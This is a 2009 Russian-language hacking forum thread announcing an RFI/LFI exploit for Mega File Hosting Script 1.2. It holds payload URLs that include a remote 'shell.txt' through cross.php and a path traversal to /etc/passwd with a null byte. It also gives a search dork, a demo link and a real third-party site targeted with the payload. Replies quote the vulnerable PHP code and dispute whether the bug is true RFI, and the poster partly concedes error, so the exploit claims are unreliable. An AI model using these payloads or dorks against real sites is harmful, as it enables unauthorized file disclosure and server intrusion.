Форум АНТИЧАТ - Mega File Hosting [ RFI/ LFI ]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - Mega File Hosting [ RFI/ LFI ] (https://forum.antichat.xyz/showthread.php?t=111709)

GarryCka

18.03.2009 00:32

Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability

удаленный / локальный файл включения

для 1.2 версий :)

#############################################
# Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability #
# Home: #
# Www.hacking.ge #
#############################################

#############################################
Просто помимо этого Exploit и наслаждайтесь #
#############################################

RFI: /cross.php?url=http://site.ru/shell.txt

LFI: /cross.php?url=../../../../../../../../etc/passwd%00

#############################################
#
Author: Garry /// 25/02/2009 #
#
#############################################

Tigger

18.03.2009 01:10

А Дорк?

Велемир

18.03.2009 01:15

Мде...........

PaCo	18.03.2009 01:26

с доркам та все понятно("Powered by: MFH v1"), life example где? скока не гуглил не нащел cross.php?url=, в каком собствено каталоге лежит cross.php? Имхо [:](||||||)[:].
ТС покажи где он тут http://sharemee.co.uk/ например

GarryCka

18.03.2009 01:27

Дорк на Mega file hosting сайта:

"Powered by: MFH " :)

GarryCka

18.03.2009 01:33

Demo : http://yabsoft.info/demo/mfhs/cross.php?url=http://forum.antichat.ru/antichat/pic/logo.gif

&

и локальный файл включения в Linux-сервер:

cross.php?url=../../../../../../../../etc/passwd%00 :)

Jokester

18.03.2009 01:44

Это код из cross.php

PHP код:


		
			
if(function_exists('curl_init'))

{

    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, $url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']);

    curl_setopt($ch, CURLOPT_HEADER, 0);

    curl_exec($ch);

    curl_close($ch);

}

elseif(ini_get('allow_url_fopen'))

{

    echo file_get_contents( ($url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']) );

}

}

PaCo	18.03.2009 01:47

Цитата:

Сообщение от GarryCka

Че та я сомневаюсь про локальные файлы, да и это не RFI - remote file include - там нету иньекта а просто чтения файла и скорее всего не локального а удаленого, да и зачем %00 ? В http://forum.antichat.ru/antichat/pic/logo.gif судя по этому ничего не добавялеться, короче скорее всего удаленые файлы просто читаються и все.

UPD покамись писал jokester все подтвердил ТС это баян, разве что как прокси использовать, вот так будет не плохая идея насчет прокси халявных

GarryCka

18.03.2009 01:47

jokester

Да, это ошибка основана на меня

Jokester

18.03.2009 01:49

Цитата:

Сообщение от GarryCka

jokester

Да, это ошибка основана на меня

Не понял фразы поясни пожалуйста

GarryCka

18.03.2009 01:50

эксплуатировать эту работает хорошо на локальный файл включения

http://allshares.ge/cross.php?url=../../../../../../../../etc/passwd%00

Не взломать этот сайт!!!

kyzmi4

18.03.2009 01:53

GarryCka

18.03.2009 01:54

jokester
Основателем этого является ошибка: garry

it's Me :)

kysmi4

da это правда

Tigger

18.03.2009 01:59

Цитата:

Сообщение от GarryCka

Бред =\
1) Через логи апача
2) Найти реальный путь и читать файлы в поисках

kyzmi4

18.03.2009 02:00

А зачем тогда писать для все версий?

GarryCka

18.03.2009 02:06

kyzmi4
sorry it's my error!

http://milw0rm.com/exploits/8230 :)

PaCo	18.03.2009 02:09

Цитата:

Сообщение от kyzmi4

Я как понимаю у тебя есть MFH v1.2 выложи плиз а то погугли и так и не нашел, хочеться посмотреть что там, мне так кажеться если нет курлов то он через file_get_contets с stream_context_create читает файлы.

Jokester

18.03.2009 02:20

Цитата:

Сообщение от PaCo

Поправил свой пост с кодом.

кому интересно

http://depositfiles.com/ru/files/qq80v50yg/
Mega_File_Hosting_Script_v1.1

Время: 14:31